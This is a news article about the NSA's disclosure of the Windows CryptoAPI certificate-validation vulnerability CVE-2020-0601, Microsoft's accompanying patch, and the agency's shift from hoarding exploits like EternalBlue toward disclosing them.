NSA Shares Vulnerability Discovered In Microsoft Windows 10 And Server Platforms

Exploit Bypasses Trust Validation Process; Patch Released

Add bookmark

Jeff Orr

NSA Discovers Vulnerability

The U.S. National Security Agency (NSA) took the unusual step of disclosing a vulnerability it discovered in the Microsoft Windows 10 and Windows Server 2016/2019 software environments. Microsoft has contemporaneously released a patch to address the concern.

A critical vulnerability (known as CVE-2020-0601) was identified in the cryptographic functionality of the Windows platform.

According to the NSA brief, the certificate validation vulnerability allows an attacker to undermine how Windows verifies cryptographic trust and can enable remote code execution. The vulnerability affects Windows 10 and Windows Server 2016/2019 as well as applications that rely on Windows for trust functionality.

Exploitation of the vulnerability allows attackers to defeat trusted network connections and deliver executable code while appearing as legitimately trusted entities. Examples where validation of trust may be impacted include: HTTPS connections, signed files and emails, and signed executable code launched as user-mode processes.

The signing process is like a stamp of approval within the Windows trust environment. This vulnerability throws signing into doubt. Fortunately, Microsoft has a patch for the affected platforms.

See Related: Task Force 7 Radio: Former NSA Officer Talks Dangers Of Information Ops

Windows: The De Facto Standard For Enterprise OS

No doubt that Windows is a dominant OS platform for the enterprise and the number of organizations impacted by this vulnerability is significant. In September 2019, Microsoft Corporate Vice President of Modern Life & Devices Yusuf Mehdi revealed its installed base. “#Windows10 is on more than 900M devices! Thanks to our customers, we added more new Windows 10 devices in the last 12 months than ever before,” Mehdi tweeted.

During Fall 2018, Microsoft officials said that more than half of all Windows enterprise devices were running Windows 10, with the other half running some older version of Windows, primarily Windows 7. With the sunset now concluding on support for Windows 7, organizations have been working diligently to migrate to the Windows 10 environment.

See Related: Enterprise Security Leaders Prepare For Nation State Cyber Attacks

A New Chapter For NSA Handling Of Cyber Vulnerabilities

On a call with media, Anne Neuberger, head of the NSA's Cybersecurity Directorate said, “[We are] recommending that network owners expedite implementation of the patch immediately as we will also be doing. When we identified a broad cryptographic vulnerability like this we quickly turned to work with the company to ensure that they could mitigate it.”

In 2017, a Windows vulnerability known to the NSA was not disclosed upfront and the agency is known to have exploited it for as many as five years. The tool developed for the exploit, known as Eternal Blue, was leaked by a hacker group and became widely adopted by individuals and nation-states to attack unpatched Windows systems.

The NSA faced further criticism over the years for its practice of hoarding vulnerabilities for its own exploitation. Most security researchers reach out to vendors and developers so issues can be fixed. The timely disclosure of this vulnerability is part of the agency’s effort to share security incidents without itself exploiting the weakness first for intelligence purposes.

See Related: Task Force 7 Radio: Baltimore Blames NSA For Ransomware Attack